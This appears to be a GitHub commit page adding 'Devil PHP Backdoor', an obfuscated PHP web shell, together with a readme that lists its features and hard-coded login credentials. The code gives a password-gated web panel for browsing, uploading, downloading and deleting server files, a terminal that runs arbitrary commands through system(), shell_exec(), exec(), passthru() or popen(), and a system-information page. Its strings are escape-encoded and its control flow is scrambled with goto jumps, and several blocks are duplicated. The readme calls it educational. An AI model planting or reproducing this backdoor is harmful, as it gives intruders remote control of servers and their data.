solid;width:100%;max-width:1920px}td{padding:5px}pre{height:500px;width:1000px;text-align:left;overflow:scroll;font-size:13px}.main-wrapper{display:flex;align-items:center;justify-content:center;min-height:100vh;height:auto;padding:20px}.link-1{text-decoration:none;color:#0bdbca}.link-2{text-decoration:none;color:#fff}.fileManContent{width:994px;height:500px;overflow:scroll;margin:0;padding:0}.fileManContent thead th{position:sticky;top:0}a{text-decoration:none;color:#09947d}</style></head><body><div><?php  goto x23Fx; K5ZdW: if (isset($_POST["\146\151\154\x65\x4e\141\155\x65"]) && !empty($_POST["\x66\x69\154\145\x4e\x61\155\145"])) { $dir = getcwd(); if (isset($_GET["\x63\150\x44\x69\x72"]) && !empty($_GET["\x63\150\x44\x69\162"])) { $dir = $_GET["\x63\150\104\x69\162"]; } $createFileFlag = createFile($dir, $_POST["\x66\x69\x6c\x65\x4e\x61\x6d\145"]); } goto hoS3m; x23Fx: if (!isset($_SESSION["\154\157\x67\x69\156"])) { ?>
<div class="center"><h1>Login to Devil PHP Backdoor</h1><br><form action="<?php  echo $_SERVER["\x50\x48\120\x5f\x53\x45\x4c\106"]; ?>
"method="POST"><input name="login"placeholder="Login"> <input name="pass"placeholder="Pssword"type="password"> <button type="submit">Login</button></form><br><hr><br><?php  echo "\74\150\x32\x3e\x53\x65\162\x76\145\162\40\x49\120\40\72\x20" . $_SERVER["\x53\x45\x52\126\105\122\x5f\x41\x44\x44\122"] . "\74\x2f\150\x32\76"; ?>
 goto NF05T; YPfBX: if (isset($_POST["\x6c\x6f\147\x69\156"]) && isset($_POST["\x70\141\163\x73"])) { if ($_POST["\154\x6f\x67\x69\156"] == "\116\x6f\x6d\141\156\120\x72\x6f\x64\150\x61\x6e" && $_POST["\x70\x61\x73\163"] == "\x4e\x6f\x6d\x61\x6e\x50\x72\x6f\x64\x68\x61\x6e\x40\x4b\x53") { $_SESSION["\154\x6f\x67\x69\x6e"] = "\x6c\157\x67\x67\145\144"; } } goto Zp5zn; NF05T: ob_start(); goto JEcBt; mQdYc: if (isset($_GET["\144\x65\154\145\164\145"]) && !empty($_GET["\144\x65\x6c\145\164\145"]) && isset($_GET["\x63\x68\x44\x69\162"])) { if (unlink($_GET["\x63\150\104\x69\162"] . "\x2f" . $_GET["\144\145\x6c\145\164\145"])) { $deleteFileFlag = "\106\151\154\x65\40\x68\x61\x73\40\x62\145\145\156\40\x64\x65\x6c\x65\164\145\144\56"; } else { $deleteFileFlag = "\103\157\165\154\x64\156\47\164\40\144\x65\x6c\x65\x74\x65\40\164\150\145\x20\146\151\x6c\x65\x2e"; } } goto Jtz3n; DEn3Z: function downloadFile($file) { if (file_exists($file)) { try { header("\103\157\156\164\x65\156\164\55\104\145\163\143\162\x69\160\164\x69\157\x6e\72\x20\x46\151\154\x65\40\124\x72\141\x6e\x73\x66\x65\x72"); header("\x43\x6f\156\x74\x65\x6e\164\x2d\x54\x79\160\145\72\40\x61\160\160\x6c\151\x63\141\x74\x69\x6f\x6e\57\157\x63\x74\x65\164\55\163\x74\162\145\x61\155"); header("\x43\157\x6e\164\x65\156\164\55\104\151\163\x70\157\163\x69\164\x69\157\156\x3a\x20\141\x74\164\x61\x63\150\155\145\156\164\x3b\x20\x66\151\154\145\x6e\x61\x6d\145\x3d\x22" . basename($file) . "\42"); header("\105\x78\x70\x69\x72\x65\163\72\40\x30"); header("\103\x61\x63\150\x65\55\103\x6f\156\164\x72\157\x6c\72\40\x6d\165\x73\164\55\x72\x65\166\141\x6c\151\x64\141\x74\x65"); header("\120\162\141\147\x6d\x61\x3a\40\160\165\x62\x6c\151\143"); header("\x43\x6f\156\x74\145\x6e\x74\x2d\114\x65\x6e\147\164\x68\72\40" . filesize($file)); readfile($file); die; } catch (Exception $e) { } } } goto Wd1_Z; wO6it: function uploadFile($path, $file) { $targetFile = $path . "\x2f" . basename($file["\x75\x70\154\157\x61\144\106\x69\x6c\x65"]["\x6e\x61\x6d\x65"]); if (!is_writable($path)) { return "\104\x6f\156\x27\164\40\x68\x61\166\145\40\x77\x72\x69\164\145\x20\160\x65\162\x6d\x69\x73\163\x69\157\x6e\56"; } else { if (move_uploaded_file($file["\165\160\154\157\x61\x64\106\151\x6c\145"]["\x74\155\160\x5f\x6e\141\155\x65"], $targetFile)) { return "\x46\x69\154\x65\40\x68\141\163\x20\142\x65\145\156\40\165\160\x6c\x6f\x61\x64\x65\x64\56"; } else { return "\103\x6f\165\154\x64\x6e\x27\x74\40\x75\x70\154\x6f\x61\x64\x20\x66\151\x6c\145\x2e"; } } } goto Yws85; qWjEv: function createFile($path, $name) { if (file_exists($path . "\57" . $name)) { echo "\x46\151\x6c\145\x20\x61\154\x72\x65\x61\x64\171\40\x65\170\x69\x73\x74\56"; } else { if (!is_writable($path)) { echo "\104\157\x6e\x27\x74\40\150\141\x76\145\x20\x77\162\151\x74\145\x20\x70\145\x72\x6d\151\x73\163\151\x6f\x6e\x2e"; } else { try { $file = fopen($path . "\x2f" . $name, "\167"); fwrite($file, "\164\x65\163\164"); fclose($file); return "\x46\151\154\x65\x20\x68\141\163\40\x62\x65\145\156\x20\x63\162\145\x61\x74\145\x64\56"; } catch (Exception $e) { return "\145\x72\162\157\162\56"; } } } } goto gH58q; jU1sD: if (!isset($_SESSION["\154\157\x67\151\x6e"])) { ?>
<div class="center"><h1>Login to Devil PHP Backdoor</h1><br><form action="<?php  echo $_SERVER["\x50\110\x50\137\123\105\114\x46"]; ?>
"method="POST"><input name="login"placeholder="Login"> <input name="pass"placeholder="Pssword"type="password"> <button type="submit">Login</button></form><br><hr><br><?php  echo "\74\x68\x32\x3e\x53\145\x72\166\x65\x72\x20\111\120\x20\72\x20" . $_SERVER["\123\x45\122\x56\x45\x52\x5f\x41\104\104\x52"] . "\74\57\150\62\x3e"; ?>
<br><hr></div><?php  } else { ?>
<h1 style="margin-top:20px">Devil PHP Backdoor</h1><table style="margin-top:20px"><tr><td><a class="simple-nav-item"href="?action=system">System Info</a></td><td><a class="simple-nav-item"href="?action=files">File Manager</a></td><td><a class="simple-nav-item"href="?action=terminal">Terminal</a></td><td><a class="simple-nav-item"href="?action=logout">Logout</a></td></tr></table><br><h2>SERVER IP<?php  echo $_SERVER["\x53\105\x52\x56\x45\122\137\101\104\104\x52"]; ?>
</h2><?php  echo posix_getpwuid(posix_geteuid())["\x6e\x61\x6d\145"]; echo "\100"; echo gethostname(); echo "\74\x62\162\x3e" . getcwd(); ?>
<br><br><hr><br><?php  if (isset($_GET["\141\x63\164\x69\x6f\156"])) { if ($_GET["\141\143\x74\x69\x6f\x6e"] == "\x66\151\x6c\145\163") { if (isset($_GET["\143\x68\x44\151\x72"]) && !empty($_GET["\x63\x68\x44\x69\162"])) { if (is_dir($_GET["\x63\x68\104\x69\x72"])) { if (is_readable($_GET["\143\x68\104\151\162"])) { chdir(strval($_GET["\143\150\104\x69\x72"])); } else { echo "\x44\x6f\x6e\x27\x74\40\x68\141\x76\145\40\x72\145\141\x64\x20\160\x65\x72\x6d\x69\163\x73\151\x6f\x6e\56"; } } else { echo "\x49\164\47\163\x20\x6e\157\164\40\141\40\144\x69\162\145\x63\164\157\x72\x79\x2e"; } } ?>
<h1 style="margin-top:20px">Devil PHP Backdoor</h1><table style="margin-top:20px"><tr><td><a class="simple-nav-item"href="?action=system">System Info</a></td><td><a class="simple-nav-item"href="?action=files">File Manager</a></td><td><a class="simple-nav-item"href="?action=terminal">Terminal</a></td><td><a class="simple-nav-item"href="?action=logout">Logout</a></td></tr></table><br><h2>SERVER IP<?php  echo $_SERVER["\x53\105\x52\126\x45\x52\x5f\101\x44\104\x52"]; ?>
</h2><?php  echo posix_getpwuid(posix_geteuid())["\x6e\x61\155\x65"]; echo "\x40"; echo gethostname(); echo "\74\142\162\76" . getcwd(); ?>
<br><br><hr><br><?php  if (isset($_GET["\x61\143\x74\151\157\x6e"])) { if ($_GET["\x61\143\x74\151\157\x6e"] == "\146\151\x6c\145\x73") { if (isset($_GET["\x63\150\104\x69\162"]) && !empty($_GET["\x63\150\x44\x69\x72"])) { if (is_dir($_GET["\143\150\x44\x69\162"])) { if (is_readable($_GET["\143\150\104\151\162"])) { chdir(strval($_GET["\x63\150\x44\x69\x72"])); } else { echo "\104\x6f\x6e\x27\164\x20\150\x61\x76\x65\40\x72\145\141\144\40\x70\x65\x72\155\151\x73\163\x69\x6f\x6e\56"; } } else { echo "\x49\164\47\163\40\x6e\157\164\40\x61\x20\x64\151\162\x65\143\164\157\162\171\x2e"; } } ?>
<form action=""><input name="chDir"placeholder="Change working directory [Current :<?php  echo getcwd(); ?>
]"style="width:900px"> <input name="action"type="hidden"value="files"> <button type="submit">Change</button></form><?php  if (isset($deleteFileFlag)) { echo $deleteFileFlag; } ?>
<table class="table-1"style="width:1024px;height:500px;margin-bottom:25px"><tr><td style="width:1000px;height:500px"><div class="fileManContent"><table style="width:100%"><thead style="background:#0bdbca;color:#000"><td>#</td><td>Name</td><td>Size</td><td>Perm</td></thead><tbody><?php  $dirList = scandir(getcwd()); $counter = 1; foreach ($dirList as $dirContent) { echo "\74\164\162\x20\x73\x74\x79\x6c\x65\x3d\x27\142\x61\x63\x6b\x67\162\157\x75\x6e\x64\72\x20\43\64\62\x34\x35\x34\63\x3b\40\x63\157\154\157\x72\72\40\43\x66\146\146\x66\x66\x66\x27\76"; echo "\74\x74\144\x3e"; echo $counter; $counter++; echo "\x3c\x2f\x74\144\x3e"; echo "\x3c\x74\144\x3e"; if (is_dir($dirContent)) { echo "\74\x61\40\x63\154\141\163\163\x3d\42\x6c\x69\156\x6b\x2d\x31\42\40\150\162\145\146\75\x27\x3f\x61\x63\164\x69\x6f\156\x3d\146\151\x6c\145\163\x26\143\150\x44\151\162\x3d" . getcwd() . "\57" . $dirContent . "\x27\76" . $dirContent . "\x3c\x61\x2f\x3e\74\142\162\76"; } else { echo $dirContent; echo showDownloadLink($dirContent); echo showDeleteLink($dirContent); } echo "\x3c\57\x74\144\x3e"; echo "\x3c\164\144\x3e"; try { if (!is_dir($dirContent)) { $size = filesize($dirContent); if ($size > 1000) { $size /= 1000; if ($size > 1000) { $size /= 1000; echo round($size) . "\40\x6d\x62"; } else { echo round($size) . "\40\x6b\x62"; } } else { echo $size . "\x20\x62\171\x74\x65\163"; } } else { echo "\x2d\55"; } } catch (Exception $e) { } echo "\x3c\57\x74\x64\76"; echo "\74\164\x64\76"; try { echo filePrmissions($dirContent); } catch (Exception $e) { } echo "\74\x2f\164\144\76"; echo "\74\x2f\x74\162\76"; } ?>
<table class="table-1"style="width:1024px;height:500px;margin-bottom:25px"><tr><td style="width:1000px;height:500px"><div class="fileManContent"><table style="width:100%"><thead style="background:#0bdbca;color:#000"><td>#</td><td>Name</td><td>Size</td><td>Perm</td></thead><tbody><?php  $dirList = scandir(getcwd()); $counter = 1; foreach ($dirList as $dirContent) { echo "\x3c\164\162\x20\x73\164\171\x6c\145\75\47\142\x61\143\153\147\x72\157\165\x6e\144\x3a\x20\x23\x34\x32\x34\65\x34\x33\73\40\x63\x6f\x6c\157\x72\x3a\x20\43\x66\146\146\x66\x66\146\x27\x3e"; echo "\74\x74\144\x3e"; echo $counter; $counter++; echo "\74\x2f\164\144\76"; echo "\74\x74\x64\76"; if (is_dir($dirContent)) { echo "\x3c\141\40\143\154\141\x73\x73\75\42\154\x69\x6e\153\x2d\61\x22\40\x68\162\145\146\75\47\77\x61\143\164\x69\x6f\x6e\75\x66\151\154\145\163\46\x63\x68\104\151\x72\75" . getcwd() . "\x2f" . $dirContent . "\x27\x3e" . $dirContent . "\74\x61\x2f\76\74\142\162\x3e"; } else { echo $dirContent; echo showDownloadLink($dirContent); echo showDeleteLink($dirContent); } echo "\74\x2f\164\x64\x3e"; echo "\x3c\164\144\76"; try { if (!is_dir($dirContent)) { $size = filesize($dirContent); if ($size > 1000) { $size /= 1000; if ($size > 1000) { $size /= 1000; echo round($size) . "\x20\x6d\x62"; } else { echo round($size) . "\x20\153\142"; } } else { echo $size . "\40\x62\171\x74\x65\x73"; } } else { echo "\x2d\55"; } } catch (Exception $e) { } echo "\x3c\x2f\x74\144\x3e"; echo "\x3c\x74\144\76"; try { echo filePrmissions($dirContent); } catch (Exception $e) { } echo "\x3c\x2f\x74\x64\x3e"; echo "\x3c\x2f\164\162\x3e"; } ?>
</tbody></table></div></td><td></td></tr></table><table class="table-1"><td><?php  if (isset($createFolderFlag)) { echo $createFolderFlag; } ?>
<form action=""method="POST"><input name="folderName"placeholder="Folder Name"style="width:320px"> <button type="submit">Create Folder</button></form></td><td><?php  if (isset($createFileFlag)) { echo $createFileFlag; } ?>
<form action=""method="POST"><input name="fileName"placeholder="File Name"stype="text"tyle="width: 320px;"> <button type="submit">Create File</button></form></td><tr><td><?php  if (isset($uploadFileFlag)) { echo $uploadFileFlag; } ?>
<form action=""method="POST"enctype="multipart/form-data"><input name="uploadFile"placeholder="Select file"style="width:320px"type="file"> <button type="submit">Upload</button></form></td></tr></table><br><?php  } elseif ($_GET["\141\x63\x74\x69\157\156"] == "\x6c\x6f\x67\157\165\x74") { unset($_SESSION["\x6c\157\x67\x69\x6e"]); session_destroy(); header("\122\145\146\162\x65\x73\150\72\60"); } elseif ($_GET["\x61\143\x74\x69\x6f\x6e"] == "\164\145\x72\155\151\x6e\x61\x6c") { ?>
<form action=""method="POST"><input name="command"placeholder="Command"style="width:900px"> <button type="submit">Execute</button></form><table class="table-1"style="width:1024;height:500px"><tr><td><pre><?php  if (isset($_POST["\143\x6f\x6d\155\141\x6e\144"]) && !empty($_POST["\x63\x6f\155\155\x61\x6e\144"])) { if (!checkFunctions("\163\171\x73\164\x65\x6d\x73")) { system(strval($_POST["\143\x6f\155\x6d\x61\x6e\x64"]), $SystemResult); } elseif (!checkFunctions("\163\150\x65\154\x6c\x5f\x65\170\145\143\x73")) { echo shell_exec(strval($_POST["\143\x6f\x6d\x6d\x61\156\x64"])); } elseif (!checkFunctions("\x70\x61\x73\163\164\150\162\165")) { echo passthru(strval($_POST["\143\x6f\x6d\155\141\x6e\x64"])); } elseif (!checkFunctions("\145\x78\x65\143")) { exec(strval($_POST["\x63\157\155\155\141\156\144"]), $ExecResult, $retval); foreach ($ExecResult as $output) { echo $output . "\74\142\162\x3e"; } } elseif (!checkFunctions("\160\157\160\x65\x6e")) { $handle = popen(strval($_POST["\143\157\155\x6d\141\x6e\x64"]) . "\40\62\76\x26\x31", "\x72"); $read = fread($handle, 2096); echo $read; fclose($handle); } else { echo "\74\150\61\76\x53\157\x72\162\x79\54\40\143\x61\x6e\47\164\40\x65\170\x65\143\165\x74\x65\40\143\157\x6d\155\141\x6e\x64\x20\41\74\x2f\150\x31\x3e"; } } ?>
<form action=""method="POST"enctype="multipart/form-data"><input name="uploadFile"placeholder="Select file"style="width:320px"type="file"> <button type="submit">Upload</button></form></td></tr></table><br><?php  } elseif ($_GET["\x61\143\x74\x69\x6f\156"] == "\154\x6f\x67\157\165\x74") { unset($_SESSION["\x6c\x6f\x67\x69\x6e"]); session_destroy(); header("\x52\145\x66\x72\145\163\x68\x3a\x30"); } elseif ($_GET["\x61\x63\164\x69\x6f\156"] == "\x74\145\x72\x6d\151\x6e\x61\154") { ?>
<form action=""method="POST"><input name="command"placeholder="Command"style="width:900px"> <button type="submit">Execute</button></form><table class="table-1"style="width:1024;height:500px"><tr><td><pre><?php  if (isset($_POST["\143\x6f\x6d\155\141\156\144"]) && !empty($_POST["\x63\157\155\x6d\x61\x6e\x64"])) { if (!checkFunctions("\x73\171\163\164\145\x6d\163")) { system(strval($_POST["\x63\157\x6d\x6d\141\156\x64"]), $SystemResult); } elseif (!checkFunctions("\163\x68\145\154\x6c\x5f\x65\x78\145\143\x73")) { echo shell_exec(strval($_POST["\143\x6f\155\x6d\x61\156\144"])); } elseif (!checkFunctions("\160\141\163\x73\164\x68\162\165")) { echo passthru(strval($_POST["\143\157\x6d\x6d\141\x6e\144"])); } elseif (!checkFunctions("\x65\170\145\x63")) { exec(strval($_POST["\143\157\155\x6d\141\156\x64"]), $ExecResult, $retval); foreach ($ExecResult as $output) { echo $output . "\74\x62\162\76"; } } elseif (!checkFunctions("\160\157\160\x65\x6e")) { $handle = popen(strval($_POST["\x63\157\155\155\x61\x6e\144"]) . "\x20\62\76\x26\x31", "\x72"); $read = fread($handle, 2096); echo $read; fclose($handle); } else { echo "\x3c\x68\x31\76\123\x6f\162\x72\x79\x2c\40\x63\x61\x6e\x27\164\x20\145\x78\145\143\x75\164\x65\x20\143\x6f\x6d\155\x61\x6e\x64\x20\x21\x3c\x2f\x68\61\76"; } } ?>
</pre></td></tr></table><?php  } else { ?>
<table class="table-1"><tr><td>Operating System</td><td><?php  echo php_uname("\x73"); ?>
</td></tr><tr><td>Release Name</td><td><?php  echo php_uname("\x72"); ?>
<table class="table-1"><tr><td>Operating System</td><td><?php  echo php_uname("\163"); ?>
</td></tr><tr><td>Release Name</td><td><?php  echo php_uname("\162"); ?>
</td></tr><tr><td>Version Information</td><td><?php  echo php_uname("\x76"); ?>
</td></tr><tr><td>Host Name</td><td><?php  echo php_uname("\x6e"); ?>
</td></tr><tr><td>Machine Type</td><td><?php  echo php_uname("\x6d"); ?>
</td></tr><tr><td>Machine Type</td><td><?php  echo php_uname("\155"); ?>
</td></tr><tr><td>PHP Version</td><td><?php  echo phpversion(); ?>
</td></tr><tr><td>PHP Interface</td><td><?php  echo php_sapi_name(); ?>
</td></tr><tr><td>Server IP</td><td><?php  echo $_SERVER["\123\105\122\x56\x45\x52\137\101\x44\104\122"]; ?>
</td></tr><tr><td>User</td><td><?php  echo posix_getpwuid(posix_geteuid())["\x6e\141\x6d\x65"]; ?>
</td></tr><tr><td>Disabled PHP Functions</td><td><?php  echo ini_get("\x64\x69\163\141\142\154\x65\137\x66\x75\x6e\x63\164\151\x6f\156\163"); ?>
</td></tr><tr><td>Server IP</td><td><?php  echo $_SERVER["\123\x45\x52\x56\105\x52\137\101\x44\x44\122"]; ?>
</td></tr><tr><td>User</td><td><?php  echo posix_getpwuid(posix_geteuid())["\156\141\155\145"]; ?>
</td></tr><tr><td>Disabled PHP Functions</td><td><?php  echo ini_get("\x64\x69\x73\x61\x62\154\145\137\x66\165\x6e\x63\164\x69\x6f\156\x73"); ?>
</td></tr></table><?php  } } else { ?>
<h1>Welcome to Devil PHP Backdoor</h1><?php  } } goto LCcPV; SwucF: function filePrmissions($file) { $perms = fileperms($file); switch ($perms & 61440) { case 49152: $info = "\x73"; break; case 40960: $info = "\x6c"; break; case 32768: $info = "\x2d"; break; case 24576: $info = "\x62"; break; case 16384: $info = "\144"; break; case 8192: $info = "\143"; break; case 4096: $info = "\160"; break; default: $info = "\165"; } $info .= $perms & 256 ? "\x72" : "\55"; $info .= $perms & 128 ? "\167" : "\55"; $info .= $perms & 64 ? $perms & 2048 ? "\x73" : "\170" : ($perms & 2048 ? "\x53" : "\55"); $info .= $perms & 32 ? "\162" : "\55"; $info .= $perms & 16 ? "\x77" : "\55"; $info .= $perms & 8 ? $perms & 1024 ? "\163" : "\x78" : ($perms & 1024 ? "\x53" : "\55"); $info .= $perms & 4 ? "\x72" : "\55"; $info .= $perms & 2 ? "\167" : "\x2d"; $info .= $perms & 1 ? $perms & 512 ? "\164" : "\x78" : ($perms & 512 ? "\124" : "\x2d"); return $info; } goto tQtbl; tQxiS: if (isset($_FILES["\165\x70\154\157\x61\144\106\151\x6c\145"]) && !empty($_FILES["\165\160\154\157\x61\x64\x46\x69\154\145"]["\156\141\x6d\145"])) { $dir = getcwd(); if (isset($_GET["\x63\x68\104\x69\x72"]) && !empty($_GET["\143\x68\104\151\x72"])) { $dir = $_GET["\x63\x68\x44\x69\162"]; } $uploadFileFlag = uploadFile($dir, $_FILES); } goto bd2b3; AtRPe: function downloadFile($file) { if (file_exists($file)) { try { header("\103\x6f\156\164\x65\x6e\164\55\104\145\163\x63\162\x69\x70\x74\x69\157\x6e\72\x20\106\x69\154\145\40\x54\162\141\156\x73\146\x65\x72"); header("\x43\157\156\x74\x65\156\164\x2d\x54\171\x70\145\x3a\40\x61\x70\x70\x6c\151\x63\141\x74\151\x6f\x6e\x2f\x6f\143\x74\145\x74\x2d\x73\164\x72\145\141\x6d"); header("\x43\x6f\x6e\x74\x65\156\164\55\104\151\163\x70\x6f\x73\151\164\x69\x6f\x6e\x3a\x20\141\x74\x74\141\x63\150\155\145\156\x74\73\x20\146\151\154\145\x6e\141\155\145\x3d\42" . basename($file) . "\42"); header("\105\170\160\x69\x72\x65\x73\72\40\x30"); header("\103\141\x63\150\145\x2d\103\157\156\x74\x72\157\x6c\72\x20\x6d\165\163\164\55\x72\x65\x76\x61\154\x69\x64\x61\x74\145"); header("\x50\x72\141\x67\x6d\x61\x3a\40\x70\x75\142\x6c\151\143"); header("\103\x6f\156\x74\145\x6e\x74\55\x4c\x65\156\147\x74\x68\72\40" . filesize($file)); readfile($file); die; } catch (Exception $e) { } } } goto ss8Yr; p67iP: function checkFunctions($param) { $disabled_functions = explode("\x2c", ini_get("\x64\151\x73\x61\x62\x6c\145\137\146\165\x6e\x63\164\151\157\156\163")); return in_array($param, $disabled_functions); } goto xMIJW; BE4IO: function showDeleteLink($file) { $dir = getcwd(); if (isset($_GET["\143\150\x44\x69\162"])) { $dir = $_GET["\143\x68\x44\151\162"]; } echo "\x3c\141\40\x68\162\x65\x66\x3d\x22\x3f\141\x63\x74\151\x6f\x6e\x3d\x66\x69\154\145\x73\x26\143\150\104\x69\162\75" . $dir . "\46\144\145\154\145\164\x65\x3d" . $file . "\x22\40\x73\x74\171\x6c\x65\75\x22\x63\157\154\x6f\162\x3a\x20\x72\145\x64\73\42\57\x3e\133\104\145\x6c\x65\164\x65\135\x3c\x2f\141\x3e"; } goto SwucF; LCcPV: ?>
<h1>Welcome to Devil PHP Backdoor</h1><?php  } } goto UgpIw; Zp5zn: function checkFunctions($param) { $disabled_functions = explode("\54", ini_get("\144\x69\x73\x61\x62\154\x65\x5f\146\x75\x6e\143\x74\151\x6f\156\x73")); return in_array($param, $disabled_functions); } goto qWjEv; xN9_z: ?>
<!doctypehtml><html><head><title>Devil PHP Backdoor</title><style>::-webkit-scrollbar{width:10px}::-webkit-scrollbar-track{box-shadow:inset 0 0 5px grey;border-radius:5px}::-webkit-scrollbar-thumb{background:#24484a;border-radius:5px}::-webkit-scrollbar-thumb:hover{background:#0bdbca}*{margin:0;padding:0}body{background:#000;color:#0bdbca;max-width:1024px;margin:auto;font-family:'Courier New',Courier,monospace}.center{margin:0;position:absolute;top:50%;left:50%;-ms-transform:translate(-50%,-50%);transform:translate(-50%,-50%)}input{width:auto;border:#0bdbca 2px solid;background:#000;color:#0bdbca;height:30px;width:200px;padding:10px;font-size:18px;font-family:'Courier New',Courier,monospace;outline:0}input:focus{border:#0bdbca 2px solid;background:#000;color:#0bdbca}button{background:#0bdbca;color:#000;outline:0;padding:10px;font-family:'Courier New',Courier,monospace;border:#0bdbca 2px solid;height:55px}.simple-nav{background:#000;border:#0bdbca 2px solid;height:40px;width:100%}.simple-nav-item{text-decoration:none;height:40px;border:#000 1px solid;background:#0bdbca;color:#000;padding:10px}.table-1{margin-top:20px;border:#0bdbca 2px solid;width:100%;max-width:1920px}td{padding:5px}pre{height:500px;width:1000px;text-align:left;overflow:scroll;font-size:13px}.main-wrapper{display:flex;align-items:center;justify-content:center;min-height:100vh;height:auto;padding:20px}.link-1{text-decoration:none;color:#0bdbca}.link-2{text-decoration:none;color:#fff}.fileManContent{width:994px;height:500px;overflow:scroll;margin:0;padding:0}.fileManContent thead th{position:sticky;top:0}a{text-decoration:none;color:#09947d}</style></head><body><div><?php  goto jU1sD; JEcBt: session_start(); goto YPfBX; gH58q: function createFolder($path, $name) { if (is_dir($path . "\57" . $name)) { return "\106\157\x6c\144\x65\162\x20\x61\x6c\x72\145\x61\144\171\40\x65\x78\x69\x73\x74\56"; } else { if (!is_writable($path)) { return "\x44\x6f\x6e\x27\x74\40\150\x61\166\145\40\167\162\151\164\x65\x20\x70\145\x72\x6d\x69\163\163\x69\x6f\x6e\x2e"; } else { try { mkdir($path . "\x2f" . $name, 511); return "\106\x6f\154\x64\x65\x72\40\x68\141\163\40\142\145\145\x6e\x20\x63\162\145\x61\164\x65\x64\x2e"; } catch (Exception $e) { return "\x65\162\x72\157\x72\x2e"; } } } } goto wO6it; nslsP: function filePrmissions($file) { $perms = fileperms($file); switch ($perms & 61440) { case 49152: $info = "\x73"; break; case 40960: $info = "\154"; break; case 32768: $info = "\55"; break; case 24576: $info = "\142"; break; case 16384: $info = "\x64"; break; case 8192: $info = "\143"; break; case 4096: $info = "\160"; break; default: $info = "\x75"; } $info .= $perms & 256 ? "\x72" : "\x2d"; $info .= $perms & 128 ? "\167" : "\55"; $info .= $perms & 64 ? $perms & 2048 ? "\x73" : "\170" : ($perms & 2048 ? "\123" : "\x2d"); $info .= $perms & 32 ? "\162" : "\x2d"; $info .= $perms & 16 ? "\x77" : "\x2d"; $info .= $perms & 8 ? $perms & 1024 ? "\163" : "\170" : ($perms & 1024 ? "\123" : "\x2d"); $info .= $perms & 4 ? "\162" : "\x2d"; $info .= $perms & 2 ? "\x77" : "\55"; $info .= $perms & 1 ? $perms & 512 ? "\164" : "\x78" : ($perms & 512 ? "\124" : "\x2d"); return $info; } goto mDIY_; U8v5_: if (isset($_FILES["\165\160\x6c\157\141\144\106\x69\x6c\145"]) && !empty($_FILES["\x75\x70\154\x6f\141\144\106\x69\x6c\x65"]["\156\141\x6d\145"])) { $dir = getcwd(); if (isset($_GET["\x63\x68\104\151\x72"]) && !empty($_GET["\143\150\x44\x69\162"])) { $dir = $_GET["\x63\150\x44\151\x72"]; } $uploadFileFlag = uploadFile($dir, $_FILES); } goto xN9_z; Wd1_Z: function showDownloadLink($file) { $dir = getcwd(); if (isset($_GET["\143\x68\104\151\x72"])) { $dir = $_GET["\143\150\104\x69\162"]; } echo "\74\141\x20\x68\162\145\x66\x3d\42\x3f\x61\143\164\x69\157\x6e\x3d\146\x69\154\x65\163\x26\x63\150\x44\151\162\x3d" . $dir . "\46\144\157\x77\x6e\154\157\141\x64\75" . $file . "\x22\x2f\x3e\133\104\x6f\x77\156\154\x6f\141\144\x5d\74\x2f\x61\x3e"; } goto IZkan; Jtz3n: if (isset($_POST["\146\151\154\x65\x4e\x61\155\145"]) && !empty($_POST["\x66\x69\154\x65\116\141\x6d\145"])) { $dir = getcwd(); if (isset($_GET["\143\150\x44\x69\162"]) && !empty($_GET["\x63\x68\x44\x69\x72"])) { $dir = $_GET["\x63\x68\104\x69\162"]; } $createFileFlag = createFile($dir, $_POST["\146\x69\x6c\x65\116\141\155\x65"]); } goto CDhow; IZkan: function showDeleteLink($file) { $dir = getcwd(); if (isset($_GET["\143\x68\104\151\x72"])) { $dir = $_GET["\x63\x68\x44\151\x72"]; } echo "\x3c\141\40\150\162\x65\146\75\42\77\141\143\164\151\x6f\156\x3d\x66\151\154\x65\163\46\143\x68\x44\151\162\75" . $dir . "\46\144\x65\154\145\x74\x65\75" . $file . "\42\40\x73\164\171\154\145\75\42\x63\157\x6c\x6f\x72\x3a\x20\162\x65\x64\x3b\42\x2f\76\x5b\x44\x65\x6c\145\164\x65\x5d\x3c\57\x61\x3e"; } goto nslsP; CDhow: if (isset($_POST["\146\x6f\x6c\x64\x65\x72\x4e\x61\155\x65"]) && !empty($_POST["\146\x6f\x6c\144\x65\162\x4e\x61\x6d\x65"])) { $dir = getcwd(); if (isset($_GET["\x63\150\104\x69\x72"]) && !empty($_GET["\143\x68\104\151\x72"])) { $dir = $_GET["\x63\150\x44\x69\x72"]; } $createFolderFlag = createFolder($dir, $_POST["\x66\157\x6c\144\145\x72\x4e\x61\x6d\145"]); } goto U8v5_; mDIY_: if (isset($_GET["\144\x6f\x77\156\154\157\x61\144"]) && !empty($_GET["\x64\x6f\167\x6e\154\157\141\x64"]) && isset($_GET["\143\150\104\x69\162"])) { downloadFile($_GET["\x63\x68\x44\x69\x72"] . "\57" . $_GET["\144\x6f\167\x6e\x6c\x6f\141\x64"]); } goto mQdYc; Yws85: function getFileMime($file) { return mime_content_type($file); } goto DEn3Z; UgpIw: ?>
</div></body></html>
 36 changes: 36 additions & 0 deletions36  
readme.md
@@ -0,0 +1,36 @@
# Devil PHP Backdoor

### What is this ?
It is a simple PHP backdoor created for educational and learning purposes.

### Features
- File Manager [Browse, download and delete files, create files and folders, upload files]
- Web shell/terminal [Execute system commands using system(), shell_exec(), passthru(), exec(), popen() functions]
- System informations
- Obfuscated

### Login Details
- Username : NomanProdhan
- Password : NomanProdhan@KS

### Screenshots
![Login Screen](https://raw.githubusercontent.com/NomanProdhan/devil-php-backdoor/master/screenshots/devil_php_backdoor_login_screen.png)

![System Information](https://raw.githubusercontent.com/NomanProdhan/devil-php-backdoor/master/screenshots/devil_php_backdoor_system_info_screen.png)

![File Manager](https://raw.githubusercontent.com/NomanProdhan/devil-php-backdoor/master/screenshots/devil_php_backdoor_file_manager_screen.png)

![Terminal](https://raw.githubusercontent.com/NomanProdhan/devil-php-backdoor/master/screenshots/devil_php_backdoor_terminal_screen.png)


### Warning !!
This backdoor is for educational purposes. Do not use it for illegal activities.

### Follow Me ;P [If you want]
- Twitter @[NomanProdhan](https://twitter.com/nomanProdhan)
- YouTube @[nomanprodhan](https://www.youtube.com/c/NOMANPRODHAN)
- Websites [www.nomantheking.com](https://nomantheking.com) [www.nomanprodhan.com](https://nomanprodhan.com)

---

If you are a Cyber Security enthusiast and want to improve your skill, you can join our Hack Zone at [www.hack.knightsquad.org](https://hack.knightsquad.org/) or [www.kshackzone.com](https://kshackzone.com/)
0 comments on commit 2909493
@Muzytch
 
Leave a comment
  
Attach files by dragging & dropping, selecting or pasting them.
